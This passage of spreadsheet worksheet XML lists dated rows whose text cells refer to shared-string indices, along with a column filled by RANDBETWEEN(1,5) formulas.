        <f t="shared" ca="1" si="455"/>
        <v>4</v>
      </c>
    </row>
    <row r="29178" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A29178" s="1">
        <v>42828.481400462966</v>
      </c>
      <c r="C29178" t="s">
        <v>10</v>
      </c>
      <c r="D29178" t="s">
        <v>6</v>
      </c>
      <c r="E29178" s="2" t="s">
        <v>26617</v>
      </c>
      <c r="F29178">
        <f t="shared" ca="1" si="455"/>
        <v>1</v>
      </c>
    </row>
    <row r="29179" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A29179" s="1">
        <v>42828.472314814811</v>
      </c>
      <c r="C29179" t="s">
        <v>10</v>
      </c>
      <c r="D29179" t="s">
        <v>112</v>
      </c>
      <c r="E29179" s="2" t="s">
        <v>26618</v>
      </c>
      <c r="F29179">
        <f t="shared" ca="1" si="455"/>
        <v>1</v>
      </c>
    </row>
    <row r="29180" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A29180" s="1">
        <v>42828.467766203707</v>
      </c>
      <c r="C29180" t="s">
        <v>10</v>
      </c>
      <c r="D29180" t="s">
        <v>367</v>
      </c>
      <c r="E29180" s="2" t="s">
        <v>26619</v>
      </c>
      <c r="F29180">
        <f t="shared" ca="1" si="455"/>
        <v>2</v>
      </c>
    </row>
    <row r="29181" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29181" s="1">
        <v>42828.444965277777</v>
      </c>
      <c r="C29181" t="s">
        <v>10</v>
      </c>
      <c r="D29181" t="s">
        <v>92</v>
      </c>
      <c r="E29181" s="2" t="s">
        <v>26620</v>
      </c>
      <c r="F29181">
        <f t="shared" ca="1" si="455"/>
        <v>1</v>
      </c>
    </row>
    <row r="29182" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29182" s="1">
        <v>42828.434525462966</v>
      </c>
      <c r="C29182" t="s">
        <v>10</v>
      </c>
      <c r="D29182" t="s">
        <v>11</v>
      </c>
      <c r="E29182" t="s">
        <v>3908</v>
      </c>
      <c r="F29182">
        <f t="shared" ca="1" si="455"/>
        <v>3</v>
      </c>
    </row>
    <row r="29183" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29183" s="1">
        <v>42828.422395833331</v>
      </c>
      <c r="C29183" t="s">
        <v>6</v>
      </c>
      <c r="D29183" t="s">
        <v>25</v>
      </c>
      <c r="E29183" t="s">
        <v>26621</v>
      </c>
      <c r="F29183">
        <f t="shared" ca="1" si="455"/>
        <v>2</v>
      </c>
    </row>
    <row r="29184" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29184" s="1">
        <v>42828.387916666667</v>
      </c>
      <c r="C29184" t="s">
        <v>48</v>
      </c>
      <c r="E29184" t="s">
        <v>26622</v>
      </c>
      <c r="F29184">
        <f t="shared" ca="1" si="455"/>
        <v>1</v>
      </c>
    </row>
    <row r="29185" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29185" s="1">
        <v>42828.378287037034</v>
      </c>
      <c r="C29185" t="s">
        <v>189</v>
      </c>
      <c r="E29185" s="2" t="s">
        <v>26623</v>
      </c>
      <c r="F29185">
        <f t="shared" ca="1" si="455"/>
        <v>3</v>
      </c>
    </row>
    <row r="29186" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29186" s="1">
        <v>42828.321203703701</v>
      </c>
      <c r="C29186" t="s">
        <v>10</v>
      </c>
      <c r="D29186" t="s">
        <v>381</v>
      </c>
      <c r="E29186" t="s">
        <v>26624</v>
      </c>
      <c r="F29186">
        <f t="shared" ref="F29186:F29249" ca="1" si="456">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="29187" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29187" s="1">
        <v>42828.215891203705</v>
      </c>
      <c r="C29187" t="s">
        <v>318</v>
      </c>
      <c r="E29187" t="s">
        <v>26625</v>
      </c>
      <c r="F29187">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29188" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29188" s="1">
        <v>42828.16846064815</v>
      </c>
      <c r="C29188" t="s">
        <v>178</v>
      </c>
      <c r="E29188" s="2" t="s">
        <v>26626</v>
      </c>
      <c r="F29188">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29189" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29189" s="1">
        <v>42828.157187500001</v>
      </c>
      <c r="C29189" t="s">
        <v>41</v>
      </c>
      <c r="E29189" t="s">
        <v>26627</v>
      </c>
      <c r="F29189">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29190" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29190" s="1">
        <v>42828.079131944447</v>
      </c>
      <c r="C29190" t="s">
        <v>10</v>
      </c>
      <c r="D29190" t="s">
        <v>6</v>
      </c>
      <c r="E29190" s="2" t="s">
        <v>26628</v>
      </c>
      <c r="F29190">
        <f t="shared" ca="1" si="456"/>
        <v>4</v>
      </c>
    </row>
    <row r="29191" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29191" s="1">
        <v>42828.05746527778</v>
      </c>
      <c r="C29191" t="s">
        <v>253</v>
      </c>
      <c r="E29191" t="s">
        <v>26629</v>
      </c>
      <c r="F29191">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29192" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29192" s="1">
        <v>42828.053402777776</v>
      </c>
      <c r="C29192" t="s">
        <v>253</v>
      </c>
      <c r="F29192">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29193" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A29193" s="1">
        <v>42828.05133101852</v>
      </c>
      <c r="C29193" t="s">
        <v>10</v>
      </c>
      <c r="D29193" t="s">
        <v>41</v>
      </c>
      <c r="E29193" s="2" t="s">
        <v>26630</v>
      </c>
      <c r="F29193">
        <f t="shared" ca="1" si="456"/>
        <v>5</v>
      </c>
    </row>
    <row r="29194" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A29194" s="1">
        <v>42828.004733796297</v>
      </c>
      <c r="C29194" t="s">
        <v>144</v>
      </c>
      <c r="E29194" s="2" t="s">
        <v>26631</v>
      </c>
      <c r="F29194">
        <f t="shared" ca="1" si="456"/>
        <v>1</v>
      </c>
    </row>
    <row r="29195" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29195" s="1">
        <v>42827.976944444446</v>
      </c>
      <c r="C29195" t="s">
        <v>41</v>
      </c>
      <c r="E29195" t="s">
        <v>26632</v>
      </c>
      <c r="F29195">
        <f t="shared" ca="1" si="456"/>
        <v>5</v>
      </c>
    </row>
    <row r="29196" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A29196" s="1">
        <v>42827.969756944447</v>
      </c>
      <c r="C29196" t="s">
        <v>10</v>
      </c>
      <c r="D29196" t="s">
        <v>6</v>
      </c>
      <c r="E29196" s="2" t="s">
        <v>26633</v>
      </c>
      <c r="F29196">
        <f t="shared" ca="1" si="456"/>
        <v>4</v>
      </c>
    </row>
    <row r="29197" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29197" s="1">
        <v>42827.932916666665</v>
      </c>
      <c r="C29197" t="s">
        <v>73</v>
      </c>
      <c r="E29197" t="s">
        <v>26634</v>
      </c>
      <c r="F29197">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29198" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29198" s="1">
        <v>42827.870393518519</v>
      </c>
      <c r="C29198" t="s">
        <v>10</v>
      </c>
      <c r="D29198" t="s">
        <v>178</v>
      </c>
      <c r="E29198" t="s">
        <v>26635</v>
      </c>
      <c r="F29198">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29199" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29199" s="1">
        <v>42827.80773148148</v>
      </c>
      <c r="C29199" t="s">
        <v>140</v>
      </c>
      <c r="E29199" t="s">
        <v>26636</v>
      </c>
      <c r="F29199">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29200" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A29200" s="1">
        <v>42827.642407407409</v>
      </c>
      <c r="C29200" t="s">
        <v>173</v>
      </c>
      <c r="E29200" s="2" t="s">
        <v>26637</v>
      </c>
      <c r="F29200">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29201" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29201" s="1">
        <v>42827.545115740744</v>
      </c>
      <c r="C29201" t="s">
        <v>253</v>
      </c>
      <c r="E29201" s="2" t="s">
        <v>26638</v>
      </c>
      <c r="F29201">
        <f t="shared" ca="1" si="456"/>
        <v>4</v>
      </c>
    </row>
    <row r="29202" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29202" s="1">
        <v>42827.433495370373</v>
      </c>
      <c r="C29202" t="s">
        <v>41</v>
      </c>
      <c r="E29202" t="s">
        <v>26639</v>
      </c>
      <c r="F29202">
        <f t="shared" ca="1" si="456"/>
        <v>5</v>
      </c>
    </row>
    <row r="29203" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29203" s="1">
        <v>42827.263622685183</v>
      </c>
      <c r="C29203" t="s">
        <v>197</v>
      </c>
      <c r="E29203" s="2" t="s">
        <v>26640</v>
      </c>
      <c r="F29203">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29204" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A29204" s="1">
        <v>42827.237812500003</v>
      </c>
      <c r="C29204" t="s">
        <v>14</v>
      </c>
      <c r="E29204" s="2" t="s">
        <v>26641</v>
      </c>
      <c r="F29204">
        <f t="shared" ca="1" si="456"/>
        <v>5</v>
      </c>
    </row>
    <row r="29205" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29205" s="1">
        <v>42826.483113425929</v>
      </c>
      <c r="C29205" t="s">
        <v>10</v>
      </c>
      <c r="D29205" t="s">
        <v>52</v>
      </c>
      <c r="E29205" t="s">
        <v>26642</v>
      </c>
      <c r="F29205">
        <f t="shared" ca="1" si="456"/>
        <v>1</v>
      </c>
    </row>
    <row r="29206" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29206" s="1">
        <v>42826.420347222222</v>
      </c>
      <c r="C29206" t="s">
        <v>63</v>
      </c>
      <c r="E29206" s="2" t="s">
        <v>26643</v>
      </c>
      <c r="F29206">
        <f t="shared" ca="1" si="456"/>
        <v>5</v>
      </c>
    </row>
    <row r="29207" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29207" s="1">
        <v>42826.37060185185</v>
      </c>
      <c r="C29207" t="s">
        <v>10</v>
      </c>
      <c r="D29207" t="s">
        <v>86</v>
      </c>
      <c r="E29207" t="s">
        <v>26644</v>
      </c>
      <c r="F29207">
        <f t="shared" ca="1" si="456"/>
        <v>4</v>
      </c>
    </row>
    <row r="29208" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A29208" s="1">
        <v>42826.353530092594</v>
      </c>
      <c r="C29208" t="s">
        <v>71</v>
      </c>
      <c r="E29208" s="2" t="s">
        <v>26645</v>
      </c>
      <c r="F29208">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29209" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29209" s="1">
        <v>42826.346030092594</v>
      </c>
      <c r="C29209" t="s">
        <v>41</v>
      </c>
      <c r="E29209" s="2" t="s">
        <v>26646</v>
      </c>
      <c r="F29209">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29210" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29210" s="1">
        <v>42826.244837962964</v>
      </c>
      <c r="C29210" t="s">
        <v>41</v>
      </c>
      <c r="E29210" t="s">
        <v>26647</v>
      </c>
      <c r="F29210">
        <f t="shared" ca="1" si="456"/>
        <v>1</v>
      </c>
    </row>
    <row r="29211" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A29211" s="1">
        <v>42826.162905092591</v>
      </c>
      <c r="C29211" t="s">
        <v>41</v>
      </c>
      <c r="E29211" s="2" t="s">
        <v>26648</v>
      </c>
      <c r="F29211">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29212" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29212" s="1">
        <v>42826.156192129631</v>
      </c>
      <c r="C29212" t="s">
        <v>41</v>
      </c>
      <c r="F29212">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29213" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A29213" s="1">
        <v>42826.15525462963</v>
      </c>
      <c r="C29213" t="s">
        <v>41</v>
      </c>
      <c r="E29213" s="2" t="s">
        <v>26648</v>
      </c>
      <c r="F29213">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29214" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A29214" s="1">
        <v>42826.064259259256</v>
      </c>
      <c r="C29214" t="s">
        <v>41</v>
      </c>
      <c r="E29214" s="2" t="s">
        <v>26649</v>
      </c>
      <c r="F29214">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29215" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29215" s="1">
        <v>42825.856631944444</v>
      </c>
      <c r="C29215" t="s">
        <v>253</v>
      </c>
      <c r="E29215" s="2" t="s">
        <v>26650</v>
      </c>
      <c r="F29215">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29216" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A29216" s="1">
        <v>42825.726944444446</v>
      </c>
      <c r="C29216" t="s">
        <v>10</v>
      </c>
      <c r="D29216" t="s">
        <v>11</v>
      </c>
      <c r="E29216" s="2" t="s">
        <v>26651</v>
      </c>
      <c r="F29216">
        <f t="shared" ca="1" si="456"/>
        <v>1</v>
      </c>
    </row>
    <row r="29217" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29217" s="1">
        <v>42825.717442129629</v>
      </c>
      <c r="C29217" t="s">
        <v>10</v>
      </c>
      <c r="D29217" t="s">
        <v>158</v>
      </c>
      <c r="E29217" s="2" t="s">
        <v>26652</v>
      </c>
      <c r="F29217">
        <f t="shared" ca="1" si="456"/>
        <v>4</v>
      </c>
    </row>
    <row r="29218" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29218" s="1">
        <v>42825.657650462963</v>
      </c>
      <c r="C29218" t="s">
        <v>10</v>
      </c>
      <c r="D29218" t="s">
        <v>52</v>
      </c>
      <c r="E29218" s="2" t="s">
        <v>26653</v>
      </c>
      <c r="F29218">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29219" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29219" s="1">
        <v>42825.629826388889</v>
      </c>
      <c r="C29219" t="s">
        <v>41</v>
      </c>
      <c r="E29219" t="s">
        <v>26654</v>
      </c>
      <c r="F29219">
        <f t="shared" ca="1" si="456"/>
        <v>1</v>
      </c>
    </row>
    <row r="29220" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29220" s="1">
        <v>42825.625925925924</v>
      </c>
      <c r="C29220" t="s">
        <v>2140</v>
      </c>
      <c r="E29220" t="s">
        <v>26655</v>
      </c>
      <c r="F29220">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29221" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29221" s="1">
        <v>42825.598564814813</v>
      </c>
      <c r="C29221" t="s">
        <v>6</v>
      </c>
      <c r="D29221" t="s">
        <v>25</v>
      </c>
      <c r="E29221" t="s">
        <v>26656</v>
      </c>
      <c r="F29221">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29222" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A29222" s="1">
        <v>42825.549444444441</v>
      </c>
      <c r="C29222" t="s">
        <v>10</v>
      </c>
      <c r="D29222" t="s">
        <v>192</v>
      </c>
      <c r="E29222" s="2" t="s">
        <v>26657</v>
      </c>
      <c r="F29222">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29223" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29223" s="1">
        <v>42825.540069444447</v>
      </c>
      <c r="C29223" t="s">
        <v>6</v>
      </c>
      <c r="D29223" t="s">
        <v>821</v>
      </c>
      <c r="E29223" t="s">
        <v>26658</v>
      </c>
      <c r="F29223">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29224" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A29224" s="1">
        <v>42825.53974537037</v>
      </c>
      <c r="C29224" t="s">
        <v>10</v>
      </c>
      <c r="D29224" t="s">
        <v>20</v>
      </c>
      <c r="E29224" s="2" t="s">
        <v>26659</v>
      </c>
      <c r="F29224">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29225" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29225" s="1">
        <v>42825.53597222222</v>
      </c>
      <c r="C29225" t="s">
        <v>10</v>
      </c>
      <c r="D29225" t="s">
        <v>1056</v>
      </c>
      <c r="E29225" t="s">
        <v>26660</v>
      </c>
      <c r="F29225">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29226" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29226" s="1">
        <v>42825.527071759258</v>
      </c>
      <c r="C29226" t="s">
        <v>10</v>
      </c>
      <c r="D29226" t="s">
        <v>290</v>
      </c>
      <c r="E29226" t="s">
        <v>26661</v>
      </c>
      <c r="F29226">
        <f t="shared" ca="1" si="456"/>
        <v>1</v>
      </c>
    </row>
    <row r="29227" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A29227" s="1">
        <v>42825.524409722224</v>
      </c>
      <c r="C29227" t="s">
        <v>10</v>
      </c>
      <c r="D29227" t="s">
        <v>89</v>
      </c>
      <c r="E29227" s="2" t="s">
        <v>26662</v>
      </c>
      <c r="F29227">
        <f t="shared" ca="1" si="456"/>
        <v>1</v>
      </c>
    </row>
    <row r="29228" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29228" s="1">
        <v>42825.507939814815</v>
      </c>
      <c r="C29228" t="s">
        <v>10</v>
      </c>
      <c r="D29228" t="s">
        <v>86</v>
      </c>
      <c r="E29228" t="s">
        <v>26663</v>
      </c>
      <c r="F29228">
        <f t="shared" ca="1" si="456"/>
        <v>5</v>
      </c>
    </row>
    <row r="29229" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A29229" s="1">
        <v>42825.494502314818</v>
      </c>
      <c r="C29229" t="s">
        <v>10</v>
      </c>
      <c r="D29229" t="s">
        <v>263</v>
      </c>
      <c r="E29229" s="2" t="s">
        <v>26664</v>
      </c>
      <c r="F29229">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29230" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29230" s="1">
        <v>42825.489560185182</v>
      </c>
      <c r="C29230" t="s">
        <v>10</v>
      </c>
      <c r="D29230" t="s">
        <v>151</v>
      </c>
      <c r="E29230" t="s">
        <v>26665</v>
      </c>
      <c r="F29230">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29231" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29231" s="1">
        <v>42825.487303240741</v>
      </c>
      <c r="C29231" t="s">
        <v>10</v>
      </c>
      <c r="D29231" t="s">
        <v>336</v>
      </c>
      <c r="E29231" s="2" t="s">
        <v>26666</v>
      </c>
      <c r="F29231">
        <f t="shared" ca="1" si="456"/>
        <v>1</v>
      </c>
    </row>
    <row r="29232" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29232" s="1">
        <v>42825.475011574075</v>
      </c>
      <c r="C29232" t="s">
        <v>10</v>
      </c>
      <c r="D29232" t="s">
        <v>56</v>
      </c>
      <c r="E29232" t="s">
        <v>26667</v>
      </c>
      <c r="F29232">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29233" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A29233" s="1">
        <v>42825.463946759257</v>
      </c>
      <c r="C29233" t="s">
        <v>10</v>
      </c>
      <c r="D29233" t="s">
        <v>52</v>
      </c>
      <c r="E29233" s="2" t="s">
        <v>26668</v>
      </c>
      <c r="F29233">
        <f t="shared" ca="1" si="456"/>
        <v>4</v>
      </c>
    </row>
    <row r="29234" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A29234" s="1">
        <v>42825.400150462963</v>
      </c>
      <c r="C29234" t="s">
        <v>65</v>
      </c>
      <c r="E29234" s="2" t="s">
        <v>26669</v>
      </c>
      <c r="F29234">
        <f t="shared" ca="1" si="456"/>
        <v>4</v>
      </c>
    </row>
    <row r="29235" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29235" s="1">
        <v>42825.389699074076</v>
      </c>
      <c r="C29235" t="s">
        <v>41</v>
      </c>
      <c r="E29235" t="s">
        <v>26670</v>
      </c>
      <c r="F29235">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29236" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29236" s="1">
        <v>42825.386979166666</v>
      </c>
      <c r="C29236" t="s">
        <v>1501</v>
      </c>
      <c r="E29236" s="2" t="s">
        <v>26671</v>
      </c>
      <c r="F29236">
        <f t="shared" ca="1" si="456"/>
        <v>4</v>
      </c>
    </row>
    <row r="29237" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29237" s="1">
        <v>42825.371412037035</v>
      </c>
      <c r="C29237" t="s">
        <v>10</v>
      </c>
      <c r="D29237" t="s">
        <v>107</v>
      </c>
      <c r="E29237" t="s">
        <v>26672</v>
      </c>
      <c r="F29237">
        <f t="shared" ca="1" si="456"/>
        <v>1</v>
      </c>
    </row>
    <row r="29238" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A29238" s="1">
        <v>42825.365844907406</v>
      </c>
      <c r="C29238" t="s">
        <v>10</v>
      </c>
      <c r="D29238" t="s">
        <v>271</v>
      </c>
      <c r="E29238" s="2" t="s">
        <v>26673</v>
      </c>
      <c r="F29238">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29239" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29239" s="1">
        <v>42825.352314814816</v>
      </c>
      <c r="C29239" t="s">
        <v>10</v>
      </c>
      <c r="D29239" t="s">
        <v>263</v>
      </c>
      <c r="E29239" t="s">
        <v>26674</v>
      </c>
      <c r="F29239">
        <f t="shared" ca="1" si="456"/>
        <v>4</v>
      </c>
    </row>
    <row r="29240" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29240" s="1">
        <v>42825.317557870374</v>
      </c>
      <c r="C29240" t="s">
        <v>535</v>
      </c>
      <c r="E29240" t="s">
        <v>26675</v>
      </c>
      <c r="F29240">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29241" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29241" s="1">
        <v>42825.259270833332</v>
      </c>
      <c r="C29241" t="s">
        <v>65</v>
      </c>
      <c r="E29241" s="2" t="s">
        <v>26676</v>
      </c>
      <c r="F29241">
        <f t="shared" ca="1" si="456"/>
        <v>2</v>
      </c>
    </row>
    <row r="29242" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29242" s="1">
        <v>42825.185532407406</v>
      </c>
      <c r="C29242" t="s">
        <v>48</v>
      </c>
      <c r="E29242" t="s">
        <v>26677</v>
      </c>
      <c r="F29242">
        <f t="shared" ca="1" si="456"/>
        <v>1</v>
      </c>
    </row>
    <row r="29243" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29243" s="1">
        <v>42825.006458333337</v>
      </c>
      <c r="C29243" t="s">
        <v>97</v>
      </c>
      <c r="E29243" t="s">
        <v>26678</v>
      </c>
      <c r="F29243">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29244" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29244" s="1">
        <v>42824.792395833334</v>
      </c>
      <c r="C29244" t="s">
        <v>6</v>
      </c>
      <c r="D29244" t="s">
        <v>25</v>
      </c>
      <c r="E29244" t="s">
        <v>26679</v>
      </c>
      <c r="F29244">
        <f t="shared" ca="1" si="456"/>
        <v>4</v>
      </c>
    </row>
    <row r="29245" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A29245" s="1">
        <v>42824.745949074073</v>
      </c>
      <c r="C29245" t="s">
        <v>107</v>
      </c>
      <c r="E29245" s="2" t="s">
        <v>26680</v>
      </c>
      <c r="F29245">
        <f t="shared" ca="1" si="456"/>
        <v>1</v>
      </c>
    </row>
    <row r="29246" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29246" s="1">
        <v>42824.721886574072</v>
      </c>
      <c r="C29246" t="s">
        <v>260</v>
      </c>
      <c r="E29246" t="s">
        <v>26681</v>
      </c>
      <c r="F29246">
        <f t="shared" ca="1" si="456"/>
        <v>5</v>
      </c>
    </row>
    <row r="29247" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A29247" s="1">
        <v>42824.701886574076</v>
      </c>
      <c r="C29247" t="s">
        <v>10</v>
      </c>
      <c r="D29247" t="s">
        <v>56</v>
      </c>
      <c r="E29247" s="2" t="s">
        <v>26682</v>
      </c>
      <c r="F29247">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29248" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29248" s="1">
        <v>42824.65053240741</v>
      </c>
      <c r="C29248" t="s">
        <v>10</v>
      </c>
      <c r="D29248" t="s">
        <v>178</v>
      </c>
      <c r="E29248" s="2" t="s">
        <v>26683</v>
      </c>
      <c r="F29248">
        <f t="shared" ca="1" si="456"/>
        <v>1</v>
      </c>
    </row>
    <row r="29249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29249" s="1">
        <v>42824.644814814812</v>
      </c>
      <c r="C29249" t="s">
        <v>10</v>
      </c>
      <c r="D29249" t="s">
        <v>107</v>
      </c>
      <c r="E29249" t="s">
        <v>26684</v>
      </c>
      <c r="F29249">
        <f t="shared" ca="1" si="456"/>
        <v>3</v>
      </c>
    </row>
    <row r="29250" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29250" s="1">
        <v>42824.638703703706</v>
      </c>
      <c r="C29250" t="s">
        <v>10</v>
      </c>
      <c r="D29250" t="s">
        <v>107</v>
      </c>
      <c r="E29250" t="s">
        <v>26685</v>
      </c>
      <c r="F29250">
        <f t="shared" ref="F29250:F29313" ca="1" si="457">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="29251" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A29251" s="1">
        <v>42824.609131944446</v>
      </c>
      <c r="C29251" t="s">
        <v>10</v>
      </c>
      <c r="D29251" t="s">
        <v>52</v>
      </c>
      <c r="E29251" s="2" t="s">
        <v>26686</v>
      </c>
      <c r="F29251">
        <f t="shared" ca="1" si="457"/>
        <v>2</v>
      </c>
    </row>
    <row r="29252" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29252" s="1">
        <v>42824.596018518518</v>
      </c>
      <c r="C29252" t="s">
        <v>10</v>
      </c>
      <c r="D29252" t="s">
        <v>86</v>
      </c>
      <c r="E29252" t="s">
        <v>26687</v>
      </c>
      <c r="F29252">
        <f t="shared" ca="1" si="457"/>
        <v>4</v>
      </c>
    </row>
    <row r="29253" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29253" s="1">
        <v>42824.576701388891</v>
      </c>
      <c r="C29253" t="s">
        <v>10</v>
      </c>
      <c r="D29253" t="s">
        <v>263</v>
      </c>
      <c r="E29253" t="s">
        <v>26688</v>
      </c>
      <c r="F29253">
        <f t="shared" ca="1" si="457"/>
        <v>5</v>
      </c>
    </row>
    <row r="29254" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29254" s="1">
        <v>42824.561666666668</v>
      </c>
      <c r="C29254" t="s">
        <v>10</v>
      </c>
      <c r="D29254" t="s">
        <v>6</v>
      </c>
      <c r="E29254" t="s">
        <v>26689</v>
      </c>
      <c r="F29254">
        <f t="shared" ca="1" si="457"/>
        <v>5</v>
      </c>
    </row>
    <row r="29255" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29255" s="1">
        <v>42824.53402777778</v>
      </c>
      <c r="C29255" t="s">
        <v>10</v>
      </c>
      <c r="D29255" t="s">
        <v>41</v>
      </c>
      <c r="E29255" t="s">
        <v>26690</v>
      </c>
      <c r="F29255">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29256" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A29256" s="1">
        <v>42824.530312499999</v>
      </c>
      <c r="C29256" t="s">
        <v>10</v>
      </c>
